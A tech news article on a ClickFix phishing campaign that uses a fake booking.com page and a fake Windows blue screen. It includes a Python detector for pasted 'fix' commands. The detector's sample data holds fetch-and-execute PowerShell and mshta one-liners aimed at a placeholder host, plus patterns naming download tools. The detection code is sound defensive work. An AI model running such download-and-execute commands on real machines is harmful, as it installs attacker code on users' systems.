This Fake Windows BSOD Is Actually A Malware Trap

Windows users will need to be a bit more cautious, as researchers at security firm Securonix have uncovered a new ClickFix malware campaign, dubbed PHALT#BLYX, targeting Microsoft’s operating system. The threat actors behind this campaign are leveraging several techniques to install malicious software, including displaying a fake blue screen of death (BSOD) error to deceive unsuspecting victims.

The attack begins when a potential victim receives a phishing e-mail purporting to be from booking.com regarding the cancellation of a reservation, which contains a link to a site that the attackers control. This site mimics what the legitimate booking.com site looks like to further lull targets into a false sense of security. These threat actors are likely attempting to take advantage of a busy time of year for travelers, as people are on the move for the holidays and events such as CES.

Image by Securonix.

The next step of the attack is particularly devious, as the web page contains an error message that instructs users to refresh the page. However, performing the page refresh causes the browser to display a full-screen message that mirrors a Windows BSOD (you know, those cryptic error messages that Microsoft's trying to make less cryptic). This fake blue screen contains steps that claim to "fix" the supposed error, when in reality they trick users into running a command that installs the malicious software.
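The tell-tale signature of a ClickFix lure like this one is a user-driven interpreter launch: a victim pastes the "fix" into a Run box or terminal, so a script host appears as a child of the desktop shell with a command line that fetches and executes remote content. The following Python script is an added example written for this article, not code from Securonix or the campaign report; it scores constructed Sysmon-style process-creation records (field names `image`, `parent`, `cmdline` and the sample command lines are assumptions, and the URLs use the reserved `.invalid` domain) and flags events that combine two or more of those traits.

```python
import re

# Constructed process-creation records in a Sysmon-like shape (hypothetical,
# not taken from the Securonix PHALT#BLYX report). The field names are assumptions.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c iwr http://example.invalid/x | iex"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd /c dir"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta http://example.invalid/a.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Build\msbuild.exe",
     "cmdline": "powershell -c Get-Date"},
]

# Script hosts a pasted "fix" command typically ends up in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that indicate an interactive, user-initiated launch (Run box, Start menu).
USER_SHELL_PARENTS = {"explorer.exe"}
# Command-line traits: pulling content from the network, and executing/hiding it.
REMOTE_FETCH = re.compile(
    r"\b(?:iwr|invoke-webrequest|curl|wget|bitsadmin|downloadstring)\b|https?://", re.I)
EXEC_HINTS = re.compile(
    r"(?:^|\s)(?:-enc|-encodedcommand|-w\s+hidden|-windowstyle\s+hidden)\b"
    r"|\b(?:iex|invoke-expression)\b", re.I)


def basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of suspicious traits found in one process-creation event."""
    reasons = []
    if basename(ev["image"]) not in INTERPRETERS:
        return reasons  # only script hosts are of interest here
    if basename(ev["parent"]) in USER_SHELL_PARENTS:
        reasons.append("interpreter launched from the user's desktop shell")
    if REMOTE_FETCH.search(ev["cmdline"]):
        reasons.append("command line fetches remote content")
    if EXEC_HINTS.search(ev["cmdline"]):
        reasons.append("command line executes or hides what it fetched")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Return (cmdline, reasons) for every event with at least min_reasons traits."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"SUSPICIOUS: {cmdline}")
        for r in reasons:
            print(f"  - {r}")
```

Requiring two traits keeps an ordinary `cmd /c dir` typed by a user, or an automated PowerShell job spawned by a build tool, from paging anyone; the threshold and the parent list are the knobs to tune against your own baseline of interactive shell usage.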

Once installed, the malware takes steps to gain elevated privileges and establishes persistence so it can survive reboots of the infected machine. It’s capable of logging keystrokes, recording a victim’s screen, and sending new executable files. Additionally, attackers can deploy a coinminer and put a victim’s machine to work on their behalf.

E-mail phishing continues to be a popular attack vector for threat actors, so users should exercise a little extra caution when receiving e-mails that contain links, lest they fall prey to devious attacks like this one.

Alan Velasco

Opinions and content posted by HotHardware contributors are their own.